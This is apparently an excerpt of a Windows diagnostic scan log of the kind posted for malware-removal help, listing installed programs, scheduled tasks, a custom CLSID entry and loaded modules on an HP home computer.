HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 3.0.3123 - Hewlett-Packard)
HP MediaSmart Internet TV (HKLM-x32\...\InstallShield_{E553760D-D7F7-48BF-BD8B-C7E23BA04CB5}) (Version: 3.0.1916 - Hewlett-Packard)
HP MediaSmart Live TV (HKLM-x32\...\InstallShield_{67626E09-5366-4480-8F1E-93FADF50CA15}) (Version: 3.0.1924 - Hewlett-Packard)
HP MediaSmart Movie Themes (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 3.0.3102 - Hewlett-Packard)
HP MediaSmart Music/Photo/Video (HKLM-x32\...\InstallShield_{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}) (Version: 3.0.3123 - Hewlett-Packard)
HP MediaSmart SlingPlayer (HKLM-x32\...\{90F6051D-A69F-4159-9203-7E20430E1056}) (Version: 2.1.1.60 - Sling Media, Inc.)
HP MediaSmart SmartMenu (HKLM\...\{88E60521-1E4E-4785-B9F1-1798A4BD0C30}) (Version: 3.0.30.1 - Hewlett-Packard)
HP MediaSmart Software Notebook Demo (HKLM-x32\...\{82A213BD-B6AA-4281-A2D3-59D51893CC56}) (Version: 1.00.0000 - Hewlett-Packard)
HP MediaSmart Webcam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.0.1913 - Hewlett-Packard)
HP Quick Launch Buttons (HKLM-x32\...\{34D2AB40-150D-475D-AE32-BD23FB5EE355}) (Version: 6.50.12.1 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{F3B912F5-EB57-45AA-B3D1-EB532BCF6EF8}) (Version: 1.2.3220.3079 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.3.50.9 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.5.32.203 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HP User Guides 0154 (HKLM-x32\...\{B51605BF-6326-4553-AE96-6D7F1813D5F5}) (Version: 1.01.0001 - Hewlett-Packard)
HP Wireless Assistant (HKLM-x32\...\{54CC7901-804D-4155-B353-21F0CC9112AB}) (Version: 3.50.9.1 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6230.0 - IDT)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1883 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Kaspersky Security Scan (HKLM-x32\...\InstallWIX_{D1282694-0693-41A8-ABC1-6D1FFC1F65C5}) (Version: 15.0.0.740 - Kaspersky Lab)
Kaspersky Security Scan (x32 Version: 15.0.0.740 - Kaspersky Lab) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1913 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.1913 - CyberLink Corp.) Hidden
Libronix Digital Library System (HKLM-x32\...\Libronix DLS) (Version:  - Libronix Corporation)
Libronix Digital Library System (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Libronix DLS Application (x32 Version: 1.00.0002 - Libronix Corporation) Hidden
LibronixUpdate (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
LightScribe System Software (HKLM-x32\...\{7EACD74C-147F-478C-9389-F9F52EE3C88A}) (Version: 1.18.10.2 - LightScribe)
LLS Resource Driver (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Logos Bible Software (HKLM-x32\...\{4331D6C3-912C-4015-9E2E-8149CF4AD56D}) (Version: 6.48.56 - Faithlife Corporation)
LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.1.94 - LSI Corporation)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Medical Office Simulation Software (MOSS) (HKLM-x32\...\ODEUNST #1) (Version:  - )
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Access 2000 Runtime (HKLM-x32\...\{00180409-78E1-11D2-B60F-006097C998E7}) (Version: 9.00.2729 - Microsoft Corporation)
Microsoft Live Search Toolbar (HKLM-x32\...\{DF802C05-4660-418c-970C-B988ADB1D316}) (Version: 3.0.560.0 - Microsoft Live Search Toolbar)
Microsoft Office 365 ProPlus - en-us (HKLM\...\O365ProPlusRetail - en-us) (Version: 16.0.7870.2031 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\OneDriveSetup.exe) (Version: 17.3.6281.1202 - Microsoft Corporation)
Microsoft OneNote Home and Student 2016 - en-us (HKLM\...\OneNoteFreeRetail - en-us) (Version: 16.0.7870.2031 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50905.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
MovieEdit Task (x32 Version: 1.3.1.21 - Canon) Hidden
Mozilla Firefox 52.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 52.0.2 (x86 en-US)) (Version: 52.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.2.6291 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
OEB Resource Driver (x32 Version: 1.00.0002 - Libronix Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7830.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
Online Plug-in (x32 Version: 14.3.0.5014 - Citrix Systems, Inc.) Hidden
Panda ActiveScan 2.0 (HKLM-x32\...\ActiveScan 2.0) (Version: 01.04.01.0014 - Panda Security)
PDF Resource Driver (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Photo Story 3 for Windows (HKLM-x32\...\{4F41AD68-89F2-4262-A32C-2F70B01FCE9E}) (Version: 3.0.1115.11 - Microsoft Corporation)
PhotoStitch (x32 Version: 3.1.14 - Canon) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.3101 - CyberLink Corp.)
Power2Go (x32 Version: 6.0.3101 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 7.0.3101 - CyberLink Corp.)
PowerDirector (x32 Version: 7.0.3101 - CyberLink Corp.) Hidden
PowerRecover (x32 Version: 5.5.1923 - CyberLink Corp.) Hidden
QLBCASL (x32 Version: 6.40.17.2 - Hewlett-Packard) Hidden
RAW Image Task 2.1 (x32 Version: 2.1 - Canon) Hidden
Realtek 8136 8168 8169 Ethernet Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0007 - Realtek)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7100.30094 - Realtek Semiconductor Corp.)
RogueKiller version 12.10.4.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 12.10.4.0 - Adlice Software)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Savings Bond Wizard (HKLM-x32\...\{566DBD89-9955-4024-9384-A6301C8C6584}) (Version: 4.15 - )
Self-service Plug-in (x32 Version: 4.3.0.8352 - Citrix Systems, Inc.) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
SlingBoxWatchYourTVAnyWhere (HKLM-x32\...\{4313E16C-811B-469F-8815-6EB98085F8B2}) (Version: 2.1.1.58 - Sling Media)
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.16104.4 - Samsung Electronics Co., Ltd.)
Smart Switch (x32 Version: 4.1.16104.4 - Samsung Electronics Co., Ltd.) Hidden
Snapshot Viewer 9.0 (HKLM-x32\...\Snapshot Viewer 9.0) (Version:  - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.29.0 - Synaptics Incorporated)
Understanding Health Insurance: A Guide to Billing and Reimburs (HKLM-x32\...\Understanding Health Insurance: A Guide to Billi~35254FEE_is1) (Version:  - Cengage Learning)
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{2FDBBCEA-62DB-45F4-B6E5-0E1FB2A1F29D}) (Version: 9.0.0.623 - AVG Technologies CZ, s.r.o.)
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Live OneCare safety scanner (HKLM-x32\...\Windows Live OneCare safety scanner) (Version:  - Microsoft Corporation)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - CACE Technologies)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3698744866-2675293530-421701469-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\KEKLR\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\amd64\FileCoAuthLib64.dll ()

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {04D9E3C8-0160-4165-B472-9D7D5DDC7153} - System32\Tasks\CLMLSvc => c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe [2009-07-23] (CyberLink)
Task: {0EB76CE7-2869-4A59-98FE-BECC7963152F} - System32\Tasks\Microsoft\Microsoft Antimalware\MpIdleTask => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {145E92C4-1FF3-4DB0-AFBD-FA4A35F22A85} - System32\Tasks\{DDBABCCF-0E03-48B8-AAC5-512D701FC2BA} => pcalua.exe -a "C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe" -d C:\Windows\SysWOW64 -c /AppMode=DOWNLOADMANAGER /SummerUpdate /PackageType=Free /ProductType=Free
Task: {1653F1CF-6E42-4A57-B1F3-2331E782F7DF} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
Task: {25329AA8-56DA-47A3-A214-CD57C79EE3BB} - System32\Tasks\EPSON WF-3620 Series Invitation {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [2013-02-28] (SEIKO EPSON CORPORATION)
Task: {2F9F7F2B-9DE0-4FD3-9DD3-D5256B0C4963} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
Task: {3477DA62-7A69-452C-85C6-51B4223BF80D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {35A45B35-0D28-49CD-B470-428AAE2985FA} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2017-03-26] (Microsoft Corporation)
Task: {36B8DCAF-7E99-45E8-8CB2-EBF259655B32} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {3F69496D-562A-4057-BF8D-BE72210FDF44} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-03-10] (HP Inc.)
Task: {461E1321-EAD9-47CE-9655-A44155D9562E} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation)
Task: {463B4B29-6E00-4416-A6C2-F5518E018A06} - System32\Tasks\CapSvcInst => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CapSvcInst.exe [2009-07-24] (CL)
Task: {4CA243C2-0C39-4E77-A907-68E5E9F001E7} - System32\Tasks\HP AR Program Upload - d4c224df55a54f048e6f468e17db3cda9ee5115ba9824a6aaa2ad50f2d58ff76 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {4FB04482-F787-40D0-9378-7C45FCCE4ABF} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
Task: {753E9114-0543-448A-9672-9E287DB4FA66} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {78667CB8-13B8-4CD5-B743-C86376C5B946} - System32\Tasks\TVAgent => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\TVAgent.exe [2009-07-24] (CyberLink Corp.)
Task: {7B40D90F-4DA6-41EA-BF23-8C81ED9BF51F} - System32\Tasks\{C8C31B20-64FD-4571-A75B-8134EA7E188D} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&page=tsInstall&installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:notoffered;alreadyoffered
Task: {7CEFAF45-0BAB-4607-AC88-18BAE86BCB6A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {7D6798B1-B1DF-4CBC-9367-7625DBE4C791} - System32\Tasks\{286CA1FA-44BE-4DAE-BD48-109C0D949B7C} => pcalua.exe -a "C:\Program Files (x86)\Administrative Medical Assisting\Fordney.exe" -d "C:\Program Files (x86)\Administrative Medical Assisting"
Task: {80647583-FC87-458C-A9A4-39DA4906BD90} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {8153CE22-9583-4852-B540-A11AC6873ECC} - System32\Tasks\HP AR Program Upload - 32facac8e4824c6b8de49339b4a017b6fdc9427e5dc9450d9173ed4d1f36a800 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {8529AC47-189E-4DDF-B06C-D355E6130614} - System32\Tasks\{C834371F-AFA0-4D39-B5C0-C65F016AC328} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&page=tsPlugin&installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:offered-installed;madedefault
Task: {855253AF-2866-4F9C-8CE0-9A0D144A0C17} - System32\Tasks\{50EF73A5-0164-4666-9D2A-362272AD6E5A} => pcalua.exe -a C:\Users\KEKLR\Desktop\HijackThis.exe -d C:\Users\KEKLR\Desktop
Task: {878A2D8B-887B-41B4-AD83-93D5BEE68755} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
Task: {8B0F422D-77F6-4C05-A968-99C5CD3225E9} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {948B8490-55F2-4AB3-A5AE-15F63AA9A2D3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-03-26] (Microsoft Corporation)
Task: {9B2A54DA-C3A9-4829-A9E5-B33271C40E76} - System32\Tasks\DVDAgent => c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe [2009-07-23] (CyberLink Corp.)
Task: {AF2F0692-3E07-4F91-87AE-683E3C6DB159} - System32\Tasks\EPSON WF-3620 Series Update {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [2013-02-28] (SEIKO EPSON CORPORATION)
Task: {B6D0E72C-8127-428D-80D2-BAA383300CC4} - System32\Tasks\CapSchedInst => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CapSchedInst.exe [2009-07-24] (CL)
Task: {B7F9420F-324E-4023-AC78-FC12672E5FC5} - System32\Tasks\HPCeeScheduleForKEKLR => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {C2B2C745-6D3C-4382-8A7A-A99C23903026} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2017-03-24] (HP Inc.)
Task: {C9A7933D-8FBB-431A-A7A3-494F7DB92609} - System32\Tasks\{E7EAECF8-C12C-48F3-A224-0E1E8217794D} => pcalua.exe -a C:\HJT\HijackThis.exe -d C:\HJT
Task: {D34DA717-71B8-45BD-9EF4-ECE24ECC4A8F} - System32\Tasks\HP AR Program Upload - c12c17c4f19f48a296a0aa8bf65f83c9246d63c68c0b4888986ace00978760d6 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {DAC5341D-288C-497E-87A6-E5B0A7BB636D} - System32\Tasks\CapUninst => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CapUninst.exe [2009-07-24] (CL)
Task: {E249B004-6E71-428A-B8C6-D6B544BF9CDE} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-03-14] (Adobe Systems Incorporated)
Task: {F48C3389-DD00-468F-A973-CFDC7DBC1811} - System32\Tasks\HP AR Program Upload - 0d60bc3f0082496cb0a78fb164966ae5a438eec360ce49da826ce93d3fddc137 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {F527B042-0A90-41E1-BB74-CB6A04386782} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation)
Task: {F7839AA3-029F-4006-8CAA-6F10A08907C6} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-03-26] (Microsoft Corporation)
Task: {FB4AE634-F4B6-4C0A-8A6A-A65CD4BDFB0A} - System32\Tasks\DRScanner Startup => C:\Program Files (x86)\Trend Micro\DRScanner\DRScanner.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\EPSON WF-3620 Series Invitation {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE
Task: C:\Windows\Tasks\EPSON WF-3620 Series Update {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE :/EXE:{3B76C7EA-C0FF-4F54-B66C-1997DF8C469D} /F:Update  SYSTEM Searches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\Windows\Tasks\HPCeeScheduleForKEKLR.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2010-05-18 14:12 - 2009-11-05 08:40 - 00085504 _____ () C:\Windows\System32\cpwmon64.dll
2016-08-23 19:23 - 2017-02-26 15:32 - 08930496 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2009-07-21 13:34 - 2009-07-21 13:34 - 00610872 _____ () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
2009-08-09 04:42 - 2009-01-21 14:47 - 00247152 ____N () C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
2009-07-01 18:44 - 2009-07-01 18:44 - 00632888 _____ () C:\Program Files (x86)\Hewlett-Packard\Shared\hpqToaster.exe
2015-06-03 13:44 - 2015-06-03 13:44 - 00315648 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\dblite.dll
2009-07-23 14:37 - 2009-07-23 14:37 - 00931112 ____N () c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMediaLibrary.dll
2009-07-24 21:24 - 2009-07-24 21:24 - 00124288 ____N () c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CLSchMgr.dll
2009-07-24 21:24 - 2009-07-24 21:24 - 00275848 ____N () c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CLCapEngine.dll
2009-07-24 21:24 - 2009-07-24 21:24 - 00349480 ____N () c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CLTinyDB.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00061440 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\PCAlerts\PCAlertsPillar.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00131072 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\ECenter\ECLibrary.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00040960 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingServer.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00005632 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingInterface.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00018944 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingMessages.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00036864 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingClients.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00007680 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\RemotingClient.dll
